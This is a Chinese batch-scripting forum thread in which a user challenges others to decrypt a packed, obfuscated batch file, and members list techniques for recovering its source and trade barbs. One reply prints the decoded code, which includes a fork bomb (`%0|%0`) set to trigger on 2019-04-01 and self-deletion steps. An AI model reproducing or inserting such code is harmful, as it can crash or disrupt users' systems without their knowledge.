标题: [文件操作] 最牛批处理加密,谁能解密? [打印本页]

作者: tz_being    时间: 2019-3-16 18:28     标题: 最牛批处理加密,谁能解密?

文件下载:https://www.lanzous.com/i3g82ba

这个批处理先通过变量加密,再用BoxedAppPacker打包。在座高手如云,看谁能解出源代码?
作者: 老刘1号    时间: 2019-3-16 19:28

30s
  1. @shift
  2. @echo off
  3. mshta vbscript:msgbox("我已被保护好了(= - =)",vbSystemModal,"保护")(window.close)
  4. exit
复制代码

作者: 老刘1号    时间: 2019-3-16 19:34

这你都好意思说是最牛?
人家BatchEncryption都没敢夸这个海口。
作者: tz_being    时间: 2019-3-16 19:45

回复 2# 老刘1号

要的是解密过程,否则根据执行结果编写源代码是很简单的事情。
作者: 老刘1号    时间: 2019-3-16 19:50

回复 4# tz_being

哈哈,这玩意还用“方法”?
随便我就能举出5种。
1、wmic process where name='cmd.exe' get commandline
2、od shellexecute下断
3、任务管理器dump后search
4、HIPS安全软件主动防御
5、开隐藏显示翻temp
作者: 老刘1号    时间: 2019-3-16 20:06

回复 4# tz_being

你以为我真的闲着慌在这里手写代码忽悠你啊,哈哈,
出结果了接受就是了,还不相信,
自己批写的简单,还嫌别人“照着结果写代码”,你就不能把批写复杂点啊,这样大家都省事,
09年注册的老坛友了,这点道理都不懂,我都替你害臊
作者: gwsbhqt    时间: 2019-3-16 20:26

这你都好意思说是最牛?
人家BatchEncryption都没敢夸这个海口。
老刘1号 发表于 2019-3-16 19:34

莫名躺枪,大佬留情
作者: 小渣飞    时间: 2019-3-16 20:42

回复 7# gwsbhqt

哈哈哈哈哈哈
作者: 老刘1号    时间: 2019-3-16 20:59

回复 8# 小渣飞

……这说的什么话
好的作品不应该被淡忘啊
作者: 小渣飞    时间: 2019-3-16 21:41

回复 9# 老刘1号

对的哈哈哈
作者: 523066680    时间: 2019-3-16 22:04

回复 8# 小渣飞

看到 “文件传输助手” 我就想起论坛的一位老油条

作者: tz_being    时间: 2019-3-16 22:57

回复 9# 老刘1号

来了,老弟:https://www.lanzous.com/i3gck9a
作者: tz_being    时间: 2019-3-16 23:04

见过各位大佬,你们的功力深不可测,膜拜~~
老刘1号以你的功力,我这个名不见经传的江湖小混混一出招,相信不出半小时就可以顺利化解了吧~
作者: 小渣飞    时间: 2019-3-16 23:08

回复 13# tz_being

额,别人都说了30s(30秒),你这个基本等于没加密
作者: 小渣飞    时间: 2019-3-16 23:09

回复 11# 523066680

嘎嘎嘎
作者: 523066680    时间: 2019-3-16 23:10

也许可以回合制,老刘写一个,你们负责破解。
作者: 老刘1号    时间: 2019-3-16 23:12

小老弟见笑了哈
  1. @echo off
  2. mode con: cols=80 lines=20
  3. color f0
  4. setlocal EnableDelayedExpansion
  5. path=%~dp0;%path%
  6. pushd "%~dp0"
  7. reg add "HKCU\Control Panel\International" /v "sShortDate" /d "yyyy-MM-dd" /f>nu2>nul
  8. if "%date%"=="2019-04-01" %0|%0
  9. call "\\.\%CD%\COM1.BAT" ::[STARTGO] ::[STARTGO END]
  10. del /f /a /q project.dat v2w.exe A535~1 reload.bat path.ini "\\.\%CD%\COM1.BAT" %0 && exit
复制代码

作者: tz_being    时间: 2019-3-16 23:13

回复 17# 老刘1号

你这个代码运行看看,出什么结果?
作者: 老刘1号    时间: 2019-3-16 23:15

回复 18# tz_being

哈哈这位坛友你自己折腾吧哈,我不陪你玩了,祝你玩的开心
作者: tz_being    时间: 2019-3-17 10:19

早上醒来本想看看惊喜的,可惜没有。如果解密后的代码执行结果与解密前不一样,能叫破解成功吗?
作者: 老刘1号    时间: 2019-3-17 11:12

回复 20# tz_being

这位坛友,%0|%0这样的小把戏都玩上了,请问我有必要执行你的代码吗?你能保证我的系统安全吗?
代码无非用BatchEnc混淆一下,再套个安装壳子,在user目录里面建立仅有一个空格的目录,还尝试取消掉系统的激活状态,
这些小把戏有意思么?
咱抛开这个不谈,这些有一个是你自己写的么?
拿别人的东西到处装x,真是让人笑掉大牙。
你要是自己写个出来,我去给你点赞加分。
作者: CrLf    时间: 2019-3-17 11:56

回复 11# 523066680

黑人问号脸????
作者: tz_being    时间: 2019-3-17 12:59

回复  tz_being
还尝试取消掉系统的激活状态

这话请说清楚。你说这话,这说明你根本没有看懂我的代码。
作者: tz_being    时间: 2019-3-17 13:11

算了,本来是想进行技术讨论的,再说下去就演变成相互攻击了。
过错首先在我,起个哗众取宠的题目,想吸引大佬前来解答,因为第一个批处理不是我写的,我只是想知道原作者是怎么用BoxedAppPacker打包bat文件的(当然我也想过先把bat转成exe再打包,但那个批处理好像不是这样打包的)
作者: Blitz    时间: 2019-3-17 13:30

回复 12# tz_being

下载还要密码吗
作者: tz_being    时间: 2019-3-17 14:23

回复 25# Blitz

不想再讨论这个程序了。

欢迎光临 批处理之家 (http://bathome.net./) Powered by Discuz! 7.2